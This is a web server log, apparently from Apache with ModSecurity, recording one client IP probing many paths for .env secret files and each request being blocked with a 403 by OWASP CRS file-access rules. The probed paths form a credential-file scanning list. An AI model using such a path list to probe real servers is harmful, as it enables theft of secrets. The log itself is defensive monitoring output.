[Mon Nov 24 09:48:41.173364 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OAwAAAAE"]
[Mon Nov 24 09:48:41.194901 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBAAAAAE"]
[Mon Nov 24 09:48:41.195129 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBAAAAAE"]
[Mon Nov 24 09:48:41.195322 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBAAAAAE"]
[Mon Nov 24 09:48:41.216809 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBQAAAAE"]
[Mon Nov 24 09:48:41.217053 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBQAAAAE"]
[Mon Nov 24 09:48:41.217243 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBQAAAAE"]
[Mon Nov 24 09:48:41.238863 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBgAAAAE"]
[Mon Nov 24 09:48:41.239092 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBgAAAAE"]
[Mon Nov 24 09:48:41.239289 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBgAAAAE"]
[Mon Nov 24 09:48:41.260797 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBwAAAAE"]
[Mon Nov 24 09:48:41.261038 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBwAAAAE"]
[Mon Nov 24 09:48:41.261218 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OBwAAAAE"]
[Mon Nov 24 09:48:41.284492 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCAAAAAE"]
[Mon Nov 24 09:48:41.284722 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCAAAAAE"]
[Mon Nov 24 09:48:41.284904 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCAAAAAE"]
[Mon Nov 24 09:48:41.306421 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCQAAAAE"]
[Mon Nov 24 09:48:41.306654 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCQAAAAE"]
[Mon Nov 24 09:48:41.306840 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCQAAAAE"]
[Mon Nov 24 09:48:41.340778 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCgAAAAE"]
[Mon Nov 24 09:48:41.341000 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCgAAAAE"]
[Mon Nov 24 09:48:41.341220 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCgAAAAE"]
[Mon Nov 24 09:48:41.368172 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCwAAAAE"]
[Mon Nov 24 09:48:41.368402 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCwAAAAE"]
[Mon Nov 24 09:48:41.368595 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/xampp/.env"] [unique_id "aSQb6dYYOaaNfnpwja-OCwAAAAE"]
[Mon Nov 24 09:48:41.398130 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODAAAAAE"]
[Mon Nov 24 09:48:41.398395 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODAAAAAE"]
[Mon Nov 24 09:48:41.398591 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/main/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODAAAAAE"]
[Mon Nov 24 09:48:41.420720 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODQAAAAE"]
[Mon Nov 24 09:48:41.420945 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODQAAAAE"]
[Mon Nov 24 09:48:41.421139 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODQAAAAE"]
[Mon Nov 24 09:48:41.443699 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODgAAAAE"]
[Mon Nov 24 09:48:41.443935 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODgAAAAE"]
[Mon Nov 24 09:48:41.444132 2025] [:error] [pid 289420] [client 45.148.10.174:56086] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kyc/.env"] [unique_id "aSQb6dYYOaaNfnpwja-ODgAAAAE"]
[Mon Nov 24 09:48:41.512782 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhZAAAAAQ"]
[Mon Nov 24 09:48:41.513007 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhZAAAAAQ"]
[Mon Nov 24 09:48:41.513185 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhZAAAAAQ"]
[Mon Nov 24 09:48:41.534623 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhZQAAAAQ"]
[Mon Nov 24 09:48:41.534850 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhZQAAAAQ"]
[Mon Nov 24 09:48:41.535029 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/prod/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhZQAAAAQ"]
